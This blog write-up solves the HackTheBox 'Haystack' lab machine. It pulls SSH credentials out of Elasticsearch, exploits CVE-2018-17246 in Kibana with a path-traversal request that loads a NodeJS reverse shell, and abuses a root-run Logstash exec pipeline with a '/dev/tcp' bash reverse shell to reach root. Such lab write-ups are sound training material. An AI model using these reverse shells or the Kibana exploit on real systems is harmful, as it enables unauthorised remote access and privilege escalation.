HackTheBox - Haystack

— Written by — 8 min read
haystack-hackthebox

Haystack is a very interesting box to learn more about the ELK (Elasticsearch, Logstash, Kibana) stack which is becoming very popular. The user part is very CTF type while the root part is more realistic scenario.

First thing first, let’s add the box IP to the hosts file:

1
[hg8@archbook ~]$ echo '10.10.10.115 haystack.htb' >> /etc/hosts

User Flag

Recon

Let’s start with the classic nmap scan:

1
2
3
4
5
6
7
8
9
10
11
[hg8@archbook ~]$ nmap -sV -sT -sC 10.10.10.115
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-29 22:08 CEST
Nmap scan report for haystack.htb (10.10.10.115)
Host is up (0.75s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http nginx 1.12.2
9200/tcp open http nginx 1.12.2

Nmap done: 1 IP address (1 host up) scanned in 87.23 seconds

Alright nothing suprising here: SSH, HTTP and 9200 which is port used by Elasticsearch. Let’s start.

Stenography

Once opening http://haystack.htb we are greeted with a single image.

1
<html><body><img src="needle.jpg" /></body></html>

gobuster doesn’t find anything else interresting. So let’s check this image :

1
2
3
[hg8@archbook ~]$ wget haystack.htb/needle.jpg
[hg8@archbook ~]$ file needle.jpg
needle.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=paint.net 4.1.1], baseline, precision 8, 1200x803, components 3

So far so good, nothing suspicious. Let’s see if we can find strings in it :

1
2
3
[hg8@archbook ~]$ strings needle.jpg
[...]
bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==

Let’s decode this base64 string :

1
2
[hg8@archbook ~]$ echo "bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==" | base64 -d
la aguja en el pajar es "clave"

A hint. Let’s keep clave in mind (key in Spanish). I think there is nothing else to find on the http service so let’s move on to the Elasticsearch instance.

Elasticsearch

Opening port 9200 return the following json:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[hg8@archbook ~]$ http haystack.htb:9200
HTTP/1.1 200 OK

{
"cluster_name": "elasticsearch",
"cluster_uuid": "pjrX7V_gSFmJY-DxP4tCQg",
"name": "iQEYHgS",
"tagline": "You Know, for Search",
"version": {
"build_date": "2018-09-26T13:34:09.098244Z",
"build_flavor": "default",
"build_hash": "04711c2",
"build_snapshot": false,
"build_type": "rpm",
"lucene_version": "7.4.0",
"minimum_index_compatibility_version": "5.0.0",
"minimum_wire_compatibility_version": "5.6.0",
"number": "6.4.2"
}
}

It’s a classic Elastic cluster. On version 6.4.2 (not the most recent one).

We can use the _cat endpoint to list all indexes :

1
2
3
4
5
6
[hg8@archbook ~]$ http "haystack.htb:9200/_cat/indices"
HTTP/1.1 200 OK

.kibana 6tjAYZrgQ5CwwR0g6VOoRg 1 0 2 0 14.3kb 14.3kb
quotes ZG2D1IqkQNiNZmi2HRImnQ 5 1 253 0 262.7kb 262.7kb
bank eSVpNfCfREyYoVigNWcrMw 5 1 1000 0 483.2kb 483.2kb

So we have bank with 1000 records and quotes with 253 records. Let’s search across those documents to see if we can find something interesting with our previous hint in mind.

According the the documentation, we can use the _search endpoint to search across all documents. Searching for the keyword key doesn’t seem to return any interesting user or information. Let’s try with the clave keyword we found in the image :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
[hg8@archbook ~]$ http "haystack.htb:9200/_search?q=clave"
HTTP/1.1 200 OK


{
"_shards": {
"failed": 0,
"skipped": 0,
"successful": 11,
"total": 11
},
"hits": {
"hits": [
{
"_id": "45",
"_index": "quotes",
"_score": 5.9335938,
"_source": {
"quote": "Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "
},
"_type": "quote"
},
{
"_id": "111",
"_index": "quotes",
"_score": 5.3459888,
"_source": {
"quote": "Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="
},
"_type": "quote"
}
],
"max_score": 5.9335938,
"total": 2
},
"timed_out": false,
"took": 25
}

Neat, sounds promising. Let’s decode :

1
2
3
4
5
[hg8@archbook ~]$ echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d
user: security

[hg8@archbook ~]$ echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d
pass: spanish.is.key

An username and a password, couldn’t ask for anything better! Is that SSH credentials ?

1
2
3
4
5
6
[hg8@archbook ~]$ ssh [email protected]
[email protected]'s password:
Last login: Thu Aug 29 16:24:15 2019 from 10.10.10.85
[security@haystack ~]$
[security@haystack ~]$ cat user.txt
04d1xxxxxxxxxxxxxxx8eb929

First step done. Time for root.

Root flag

Now that we have user let’s try to elevate privilege. Privilege enumeration scripts output nothing really interresting so let’s focus on the ELK stack again which seems the core part of this box.

Pivot security -> kibana user

Kibana and Logstash are installed but configuration files are inaccesible to the security user :

1
2
3
4
5
6
7
8
9
10
11
12
[security@haystack conf.d]$ cat /etc/passwd
[...]
security:x:1000:1000:security:/home/security:/bin/bash
elasticsearch:x:997:995:elasticsearch user:/nonexistent:/sbin/nologin
logstash:x:996:994:logstash:/usr/share/logstash:/sbin/nologin
kibana:x:994:992:kibana service user:/home/kibana:/sbin/nologin

[security@haystack conf.d]$ cd /opt/kibana/
-bash: cd: /opt/kibana/: Permiso denegado

[security@haystack conf.d]$ cat /etc/logstash/conf.d/filter.conf
cat: /etc/logstash/conf.d/filter.conf: Permiso denegado

Seems like we will need to pivot to Kibana or Logstash user to make progress.

For now we don’t have informations about neither Kibana nor Logstash. Let’s check Elasticsearch again :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[hg8@archbook ~]$ http haystack.htb:9200
HTTP/1.1 200 OK

{

"cluster_name": "elasticsearch",
"cluster_uuid": "pjrX7V_gSFmJY-DxP4tCQg",
"name": "iQEYHgS",
"tagline": "You Know, for Search",
"version": {
"build_date": "2018-09-26T13:34:09.098244Z",
"build_flavor": "default",
"build_hash": "04711c2",
"build_snapshot": false,
"build_type": "rpm",
"lucene_version": "7.4.0",
"minimum_index_compatibility_version": "5.0.0",
"minimum_wire_compatibility_version": "5.6.0",
"number": "6.4.2"
}
}

Elasticsearch is in version 6.4.2 for a build date of September 2018. That’s quite old.

And indeed after a bit of GoogleFu we stumbled upon CVE-2018-17246 :

Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.

More informations are available on CyberArk website and gives us example on how to run this exploit.

First we need to write a NodeJS reserve shell (I used the one found here) to the /tmp/hg8.js folder:

1
2
3
4
5
6
7
8
9
10
11
12
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8585, "10.10.10.10", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/;
})();

Start netcat utility to listen for the reverse shell:

1
2
nc -l -vv -p 8585
Listening on any address 8585

Let’s now launch the exploit on the local instance of Kibana.
According to the documentation Kibana runs on port 5601 :

The default settings configure Kibana to run on localhost:5601.

We now have every informations needed, let’s launch our exploit:

1
curl "http://localhost:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../../../../tmp/hg8.js"

On our netcat the connection appear :

1
2
3
4
5
[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585
Connection from 10.10.10.10:53792
id
uid=994(kibana) gid=992(kibana) grupos=992(kibana) contexto=system_u:system_r:unconfined_service_t:s0

Good we are on Kibana user now.

Let’s upgrade our shell to a fully interactive one for easiest work (check out this blog post for more informations):

1
2
3
4
5
6
7
$ python -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm-256color
$ export SHELL=/bin/bash
$ # CTRL + Z
$ stty raw -echo;fg
reset
$

Logstash -> root

Looking around show that /opt/kibana/ turn out to be empty, /etc/elasticsearch/ still can’t be accessed.

/etc/logstash/ belong to kibana group so we can read the content. Let’s dig.

As a reminder Logstash is a tool that collect various logs, parses them, and writes the parsed data to an Elasticsearch cluster :

Logstash (part of the Elastic Stack) integrates data from any source, in any format with this flexible, open source collection, parsing, and enrichment pipeline.
https://www.elastic.co/fr/products/logstash

Once reading the startup.options file, an information catch the eye :

1
2
3
4
5
6
$ cat /etc/logstash/startup.options
# user and group id to be invoked as
#LS_USER=logstash
#LS_GROUP=logstash
LS_USER=root
LS_GROUP=root

So Logstash will run not as logstash user but as root user. We are on the right track.
The conf.d folder contains three files. According to its contents, here what each file do:

  • input.conf tell Logstash where to search for logs.
  • filter.conf filter what data is treated and what is ignored.
  • output.conf define what to do with parsed data.

Let’s look first at input.conf and output.conf :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ cat input.conf
input {
file {
path => "/opt/kibana/logstash_*"
start_position => "beginning"
sincedb_path => "/dev/null"
stat_interval => "10 second"
type => "execute"
mode => "read"
}
}

$ cat output.conf
output {
if [type] == "execute" {
stdout { codec => json }
exec {
command => "%{comando} &"
}
}
}

According to this config Logstash will, every 10 seconds :

  1. Check for file named logstash_* in the /opt/kibana/ folder.
1
2
3
4
path => "/opt/kibana/logstash_*"
stat_interval => "10 second"
type => "execute"
mode => "read"
  1. Check the file content for data matching filters (a regex) defined in filter.conf.

  2. Send the matched data to be executed in background :

1
2
3
exec {
command => "%{comando} &"
}

Good, it seems we can write any command in a file named /opt/kibana/logstash_* and it should be run as root. Neat.
But first we have to make sure the command match the filter to be parsed correctly by logstash.

Let’s understand that filter :

1
2
3
4
5
6
7
8
$ cat filter.conf
filter {
if [type] == "execute" {
grok {
match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
}
}
}

That’s a complicated syntax at first look. Logstash documentation present grok as :

Grok is a great way to parse unstructured log data into something structured and queryable.

So it’s a kind of regex. Let’s understand it step by step :

Ejecutar\s*comando\s*:\s+ is a simple regex, meaning that the file have to begin with this sentence.
%{GREEDYDATA:comando} is the interresting grok part. According to the grok pattern source GREEDYDATA correspond to a .* in regex.

So basically, when given the following line : Ejecutar comando : id grok will match the line and take the id part and parse it as commando variable to the Logstash output (command => "%{comando} &" as seen in output.conf).

Let’s put all those informations together and try to get a root shell.

First as usual let’s open a netcat listener :

1
2
nc -l -vv -p 4485
Listening on any address 4485 (assyst-dr)

Then create the file Logstash will take as input (/opt/kibana/logstash_*) with the correct content matching the filter.conf.

1
echo "bash -i >& /dev/tcp/10.10.10.10/4485 0>&1" > /opt/kibana/logstash_hg8

We then wait a bit and fairly quicky we get an incoming connection as root:

1
2
3
4
5
6
7
nc -l -vv -p 4485
Listening on any address 4485 (assyst-dr)
Connection from 10.10.10.115:49446
bash: no hay control de trabajos en este shell
[root@haystack /]# cat /root/root.txt
3f5f727xxxxxxxxxxxx9d92
[root@haystack /]#

As always do not hesitate to contact me for any questions or feedbacks ;)

See you next time !

-hg8



CTFHackTheBoxEasy Box
, , , , , , , , ,